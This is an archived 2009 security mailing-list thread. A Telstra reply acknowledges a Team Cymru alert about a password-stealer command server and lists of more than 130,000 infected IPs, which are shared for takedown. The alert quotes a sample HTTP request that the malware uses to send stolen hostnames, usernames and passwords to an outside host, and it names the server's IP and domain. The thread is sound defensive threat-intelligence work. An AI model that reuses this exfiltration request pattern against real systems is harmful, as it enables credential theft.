[nsp-sec] ACK AS 1221 RE: 130K+ Infected Ips on ~3600 ASNs
Chisholm, Glenn L
Glenn.L.Chisholm at team.telstra.com
Thu Oct 1 19:23:32 EDT 2009
Many thanks as always.
Glenn Chisholm
General Manager, Network Security
This communication may contain CONFIDENTIAL information of Telstra Corporation Limited (ABN 33 051 775 556). It may also be the subject of LEGAL PROFESSIONAL PRIVILEGE and/or under copyright. If you are not an intended recipient, you MUST NOT keep, forward, copy, use, save or rely on this communication, and any such action is unauthorised and prohibited. If you have received this communication in error, please reply to this e-mail to notify the sender of its incorrect delivery, and then delete both it and your reply.
-----Original Message-----
From: nsp-security-bounces at puck.nether.net [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Stephen Gill
Sent: Friday, 2 October 2009 3:48 AM
To: NSP-SEC List
Subject: [nsp-sec] 130K+ Infected Ips on ~3600 ASNs
----------- nsp-security Confidential --------
Hi Team,
This password stealer head end IP appears to be quite busy:
76.73.37.250
We're working w/ the ISP on takedown, however in the meantime here is a list
of 130K+ infected Ips seen talking to it primarily via TCP 80 (reporting
stolen credentials) and UDP 7006 - UDP 7012. I don't anticipate an IP
takedown to last forver because they can likely re-route via DNS.
ASN list:
https://www.cymru.com/nsp-sec/Owned/stealer/asns.txt
Infected IP list:
https://www.cymru.com/nsp-sec/Owned/stealer/
eg https://www.cymru.com/nsp-sec/Owned/stealer/as3.txt
Timestamps in UTC.
Some clarification on the formatting:
3 | 18.26.4.9 | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS -
Massachusetts Institute of Technology
The timestamp column will begin with a U or a T. U is for UDP, T for TCP.
When possible we've preferred to list out a T if we have seen any TCP 80
traffic from the client IP in question.
It looks like the malware on the client may choose its source IP address
since we noticed some RFC 1918 traffic so it is possible the UDP data will
not match in all cases. I cannot guarantee that the UDP traffic is not part
of some type of actual software but it sure looks suspicious. Here is a
public URL for reference:
http://www.prevx.com/filenames/1240768162315901-X1/CDSETUP.EXE.html
As there is UDP involved we cannot guarantee that there are 0 spoofed Ips,
but on the TCP side that is another matter.
HTTP credential stealing looks something like this:
GET
/pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php&u=%STOLEN_USERNAME&
p=STOLEN_PASSWORD HTTP/1.1
User-Agent: Mozilla/4.0 (compatible).
Host: hotshows.org.
.
Cheers,
-- steve
--
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security
Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
community. Confidentiality is essential for effective Internet security counter-measures.
_______________________________________________
-------------- next part --------------
A non-text attachment was scrubbed...
Name: PGP.sig
Type: application/pgp-signature
Size: 821 bytes
Desc: not available
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20091002/dce026aa/attachment-0001.sig>
More information about the nsp-security
mailing list